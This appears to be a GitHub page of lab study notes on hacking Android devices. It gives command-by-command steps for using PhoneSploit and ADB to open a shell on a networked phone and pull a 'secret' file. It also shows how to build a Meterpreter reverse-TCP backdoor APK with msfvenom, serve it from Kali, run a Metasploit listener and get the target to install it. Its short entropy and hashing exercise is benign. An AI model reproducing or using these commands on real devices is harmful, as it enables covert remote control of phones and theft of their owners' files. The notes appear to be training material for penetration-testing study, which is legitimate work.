You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
#OR
python3 -m pip install colorama
python3 phonesploit.py
# Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device# Type 4, to Access Shell on phonepwd
ls
cd sdcard
ls
cd Download
#Download File using PhoneSploit
9. Pull Folders from Phone to PC
#Enter the Full Path of file to Download
sdcard/Download/secret.txt
Check entropy and hash of elf file using ADB Tool
#Perform deep scan of the elf files and obtain the last 4 digits of SHA 384 hash of the file with highest entropy value
adb connect 192.168.0.4:5555 # Connection Establish Steps
adb shell
#1. check elf file with highest entropy
ls sdcard/scan #check if there're .elf files
sudo adb pull /sdcard/scan #download entire dir including .elf files
ent -h #ent tool options, if we haven't it: apt install ent
ent first_file.elf #Entropy value 3.28412 bits, it has highest value of entropy.
ent second_file.elf #Entropy value 1.15679 bits
#2. check the last 4 digits of SHA 384
sha384sum --help
sha384sum first_file.elf
#select only the last 4 digits of hash.
Generating and Executing Payloads for Android
Setup Android
Open terminal, run su
Run ip addr add 10.10.10.69/24 dev eth0
Generate Payload
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk R raw
Host the payload and run a listener on Kali
Type use exploit/multi/handler
Type set payload android/meterpreter/reverse_tcp
Type set LHOST 10.10.10.11
Start listener, type exploit -j -z
Browse link of file to start meterpreter session.
Exploit Execution
Open kali hosted link.
Download APK using es file downloader.
Install and run.
Exploit the Android Platform through ADB using PhoneSploit